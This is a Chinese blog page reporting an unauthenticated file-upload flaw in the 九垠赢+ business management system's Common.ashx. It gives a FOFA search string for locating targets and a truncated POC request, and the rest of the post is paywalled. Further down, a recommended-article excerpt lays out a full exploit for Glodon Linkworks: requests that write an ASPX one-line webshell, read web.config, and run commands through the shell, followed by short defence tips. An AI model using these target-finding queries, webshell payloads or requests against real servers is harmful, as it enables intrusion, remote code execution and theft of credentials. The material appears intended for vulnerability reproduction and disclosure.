九垠赢商业管理系统Common.ashx存在文件上传漏洞

九垠系统文件上传漏洞及相关信息
最新推荐文章于 2025-11-26 18:56:35 发布
原创 最新推荐文章于 2025-11-26 18:56:35 发布 · 362 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#web安全

简介

成都和力九垠科技有限公司成立于1999年,是一家专业从事零售业全流程解决方案的高科技公司,总部位于四川成都。多年来,九垠软件不忘初衷,一直致力于中国零售企业的成长与发展,为广大客户提供优秀的零售商业管理软件与优质的金牌售后服务。经过多年的积累与发展,九垠科技已成为中国零售企业管理信息化的领导品牌。

九垠赢+商业管理系统 Common.ashx 存在文件上传漏洞,未经身份攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个 web 服务器。

fofa

"九垠赢"

poc

POST /System/Common.ashx?type=savefile&path
最低0.47元/天 解锁文章
成都和力科技有限公司系统Common存在任意文件上传漏洞
缘梦未来的博客
01-04 774
成都和力科技有限公司成立于1999年,是一家专业从事零售业全流程解决方案的高科技公司,总部位于四川成都。多年来,软件不忘初衷,一直致力于中国零售企业的成长与发展,为广大客户提供优秀的零售商业管理软件与优质的金牌售后服务。经过多年的积累与发展,科技已成为中国零售企业管理信息化的领导品牌。
+商业管理系统 Common.ashx 文件上传致RCE漏洞复现
0xSec
12-31 1286
+商业管理系统 Common.ashx 存在文件上传漏洞,未经身份攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个web服务器。
商业管理系统Common.ashx存在文件上传
swordheart的博客
05-28 281
商业管理系统Common.ashx存在文件上传
同享人力资源管理系统UploadHandler.ashx存在文件上传漏洞
wan___she__pi的博客
08-23 345
同享人力资源管理系统"是一种多用户共享的人力资源管理软件系统,旨在帮助组织有效地管理员工信息和相关流程,集合了多用户访问、员工信息管理、招聘流程支持、绩效评估、培训管理、报表和分析、安全和权限控制等,通过提供一体化的管理工具,帮助组织提高人力资源管理效率、优化流程,并确保员工信息的安全和可靠性。
中成科信票务管理系统UploadHandler.ashx存在任意文件上传漏洞
缘梦未来的博客
11-25 376
中成科信票务管理系统是专注于演出剧院、体育场馆、旅游景区、游乐园、场地活动的票务管理系统,并为特殊客户量身定制票务应用解决方案,可根据用户的要求采用不同的技术载体实现门票的防伪:二维条码门票防伪技术、RFID电子门票防伪技术、手机二维码门票技术、变温微缩文字荧光等防伪票纸技术。
中成科信票务管理系统 UploadHandler.ashx 任意文件上传漏洞复现
0xSec
08-20 576
中成科信票务管理系统 UploadHandler.ashx 任意文件上传漏洞,未经身份攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个web服务器。
同享人力资源管理系统UploadHandler.ashx接口存在任意文件上传漏洞
nnn2188185的博客
08-20 214
同享人力资源管理系统UploadHandler.ashx接口存在任意文件上传漏洞
方天云智慧平台系统 Upload.ashx 任意文件上传漏洞复现
0xSec
07-31 1414
方天云智慧平台系统 Upload.ashx 接口处存在任意文件上传漏洞,未经身份验证的攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个web服务器。
SpringSecurity相关jar包的介绍
2509_94006941的博客
11-26 283
Spring Security是spring采用AOP思想,基于servlet过滤器实现的安全框架。它提供了完善的认证机制和方法级的 授权功能。是一款非常优秀的权限管理框架。Spring Security主要jar包功能介绍。
2025年第二届全国网络安全行业职业技能大赛 网络安全管理员样题
Aluxian_的博客
11-22 1944
2025年全国网络安全行业职业技能大赛网络安全管理员赛项样题发布。比赛旨在测评选手在网络安全管理全流程中的核心能力,包括安全防护、管理和处置。比赛采用在线远程形式,选手需自行准备工具,通过提交Flag形式答题。赛题分为三个任务:网络及服务器维护(40%)、互联网应用安全维护(30%)和网络安全数据审查(30%),涉及iptables配置、数据备份、站点分析和流量审查等内容。比赛要求选手具备扎实的理论基础和实操能力,所有操作需符合行业规范。比赛总分100分,违规操作将取消成绩。
TSIA 022.1—2021 工业互联网标识解析顶级节点服务能力成熟度第1部分:模型.pdf
11-27
TSIA 022.1—2021 工业互联网标识解析顶级节点服务能力成熟度第1部分:模型
【事件触发一致性】研究多智能体网络如何通过分布式事件驱动控制实现有限时间内的共识(Matlab代码实现)
11-27
【事件触发一致性】研究多智能体网络如何通过分布式事件驱动控制实现有限时间内的共识(Matlab代码实现)内容概要:本文档围绕多智能体网络中的事件触发一致性控制展开,重点研究如何通过分布式事件驱动控制策略实现多智能体系统在有限时间内达成共识,并提供了基于Matlab的代码实现。文档还涵盖了无人机路径规划、多目标跟踪、图像处理、故障诊断、优化算法等多个科研方向的技术实现与仿真案例,展示了事件触发机制在多智能体协同控制中的高效性与节能优势。核心技术包括分布式控制算法设计、事件触发条件设定、系统收敛性分析及仿真验证。; 适合人群:具备一定自动化、控制理论或计算机背景的研究生、科研人员及从事智能系统开发的工程师,熟悉Matlab编程与基本控制系统建模者更佳。; 使用场景及目标:①研究多智能体系统在资源受限条件下的协同控制问题;②掌握事件触发机制相较于传统周期采样控制的优势;③实现多无人机、机器人等系统的高效协同与节能通信;④为分布式控制算法的仿真与验证提供可复用的代码框架。; 阅读建议:建议结合Matlab代码逐模块理解算法实现流程,重点关注事件触发条件的设计逻辑与系统稳定性证明部分,可进一步拓展至其他分布式优化与协同控制应用场景。
【四轴飞行器】非线性三自由度四轴飞行器模拟器研究(Matlab代码实现)
11-27
【四轴飞行器】非线性三自由度四轴飞行器模拟器研究(Matlab代码实现)内容概要:本文围绕非线性三自由度四轴飞行器模拟器的研究展开,重点介绍了基于Matlab的建模与仿真方法。通过对四轴飞行器的动力学特性进行分析,构建了非线性状态空间模型,并实现了姿态与位置的动态模拟。研究涵盖了飞行器运动方程的建立、控制系统设计及数值仿真验证等环节,突出非线性系统的精确建模与仿真优势,有助于深入理解飞行器在复杂工况下的行为特征。此外,文中还提到了多种配套技术如PID控制、状态估计与路径规划等,展示了Matlab在航空航天仿真中的综合应用能力。; 适合人群:具备一定自动控制理论基础和Matlab编程能力的高校学生、科研人员及从事无人机系统开发的工程技术人员,尤其适合研究生及以上层次的研究者。; 使用场景及目标:①用于四轴飞行器控制系统的设计与验证,支持算法快速原型开发;②作为教学工具帮助理解非线性动力学系统建模与仿真过程;③支撑科研项目中对飞行器姿态控制、轨迹跟踪等问题的深入研究; 阅读建议:建议读者结合文中提供的Matlab代码进行实践操作,重点关注动力学建模与控制模块的实现细节,同时可延伸学习文档中提及的PID控制、状态估计等相关技术内容,以全面提升系统仿真与分析能力。
沱江.zip
11-27
三级水系流域矢量数据,数据格式shp格式,坐标系wgs84,真实可靠可打开,放心使用
nuscene-infos-vals
11-27
nuscene-infos-vals
基于SpringBoot+Mybatis框架的私人影院预约系统.zip
11-27
基于SpringBoot+Mybatis框架的私人影院预约系统.zip
51单片机c源码-独立式键盘控制步进电机实验
11-27
51单片机c源码-独立式键盘控制步进电机实验
电容测量电路Multisim仿真实例
最新发布
11-27
提供了一个电容测量电路的Multisim仿真实例,旨在帮助用户理解和实践电容测量电路的设计与仿真。通过这个仿真实例,您可以学习如何使用Multisim软件进行电路仿真,并掌握电容测量电路的基本原理和操作方法。 资源内容 电容测量电路Multisim仿真实例:包含了一个完整的电容测量电路的Multisim仿真文件,用户可以直接打开并运行仿真。 使用说明 下载资源:点击下载链接,获取电容测量电路的Multisim仿真文件。 安装Multisim:确保您已经安装了Multisim软件,如果没有安装,请先下载并安装Multisim。 打开仿真文件:在Multisim中打开下载的仿真文件,即可开始仿真。 运行仿真:根据需要调整电路参数,运行仿真并观察结果。 适用人群 电子工程专业的学生和教师 对电路仿真感兴趣的爱好者 需要进行电容测量电路设计的工程师
【评估多目标跟踪方法】9个高度敏捷目标在编队中的轨迹和测量研究(Matlab代码实现)
11-27
【评估多目标跟踪方法】9个高度敏捷目标在编队中的轨迹和测量研究(Matlab代码实现)内容概要:本文围绕“评估多目标跟踪方法”展开,重点研究9个高度敏捷目标在编队飞行中的轨迹生成与测量问题,并提供了完整的Matlab代码实现。文中详细探讨了多目标运动建模、轨迹仿真、测量数据生成及跟踪算法的验证方法,旨在为雷达、无人机编队、智能监控等领域的多目标跟踪技术提供仿真基础与评估手段。研究强调高动态目标间的协同运动特性及复杂环境下的可观测性分析,结合实际应用场景提升跟踪系统的鲁棒性与精度。; 适合人群:具备一定Matlab编程能力,从事自动化、电子信息、航空航天、智能交通等相关领域研究的研究生、科研人员及工程技术人员。; 使用场景及目标:①用于多目标跟踪算法(如JPDA、IMM、PHD滤波等)的性能评估与仿真验证;②支撑无人机编队控制、空中交通管理、军事防御系统中的目标轨迹预测与感知研究;③作为科研项目、毕业设计或学术论文的技术参考与代码基础。; 阅读建议:建议结合文中提供的Matlab代码进行实践操作,重点关注目标运动模型构建、噪声处理与测量仿真部分,可进一步扩展至不同编队拓扑与干扰环境下的跟踪效果对比分析。
广联达Linkworks mobileAction.ashx/do.asmx 任意文件写入读取漏洞复现
07-15
广联达 Linkworks 是一款广泛应用于建筑行业的协同管理平台。在某些版本中,由于对 `mobileAction.ashx` 和 `do.asmx` 接口的安全控制不足,导致存在任意文件写入和读取的漏洞。攻击者可以利用此漏洞上传恶意文件或读取服务器上的敏感文件,从而获取系统控制权限或敏感信息。 以下是该漏洞的复现步骤及技术细节: ### 3.1 漏洞原理 `mobileAction.ashx` 和 `do.asmx` 是广联达 Linkworks 提供的 Web 服务接口,原本用于处理移动端请求。由于未对用户输入进行严格过滤和权限控制,攻击者可以通过构造特定的请求,向服务器写入任意内容的文件(如 `.aspx`、`.txt` 等),并可通过其他接口读取这些文件内容,从而实现远程代码执行或信息泄露。 该漏洞的核心在于未对上传路径和文件内容进行限制,允许通过特定参数控制文件名和写入内容。 ### 3.2 漏洞复现环境搭建 - **目标系统**:广联达 Linkworks 某些未修复版本(具体版本需根据实际测试) - **工具准备**: - Burp Suite 或 Postman - 文本编辑器(用于构造 payload) ### 3.3 任意文件写入(WebShell) 构造如下请求,通过 `mobileAction.ashx` 接口写入一个简单的 WebShell 文件: ```http POST /mobileAction.ashx HTTP/1.1 Host: target.com Content-Type: application/x-www-form-urlencoded action=writefile&filename=upload/test.aspx&content=<%Eval(Request("cmd"))%> ``` - `action=writefile` 表示执行写文件操作 - `filename` 指定写入路径,如 `upload/test.aspx` - `content` 为写入内容,此处为 ASPX 一句话木马 若服务器未做严格校验,将在 `upload/` 目录下生成 `test.aspx` 文件,内容为 WebShell 代码。 ### 3.4 任意文件读取 通过 `do.asmx` 接口构造请求读取任意文件内容: ```http POST /do.asmx HTTP/1.1 Host: target.com Content-Type: application/x-www-form-urlencoded action=readfile&filename=../web.config ``` - `action=readfile` 表示执行读文件操作 - `filename` 指定读取路径,如 `../web.config`,可读取配置文件、数据库连接字符串等敏感信息 ### 3.5 漏洞利用验证 访问写入的 WebShell 文件: ```http GET /upload/test.aspx?cmd=whoami HTTP/1.1 Host: target.com ``` 若服务器返回当前执行用户的用户名,则说明成功执行了命令,漏洞利用成功。 ### 3.6 防御建议 - **升级系统**:官方已发布修复补丁,请及时升级至安全版本。 - **限制上传路径**:禁止用户上传可执行脚本文件(如 `.aspx`、`.php` 等)。 - **输入过滤**:对文件名、路径、内容等参数进行严格校验,防止任意写入。 - **权限控制**:限制 Web 服务接口的访问权限,仅允许授权用户调用。 - **日志审计**:加强日志记录与审计,及时发现异常请求。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值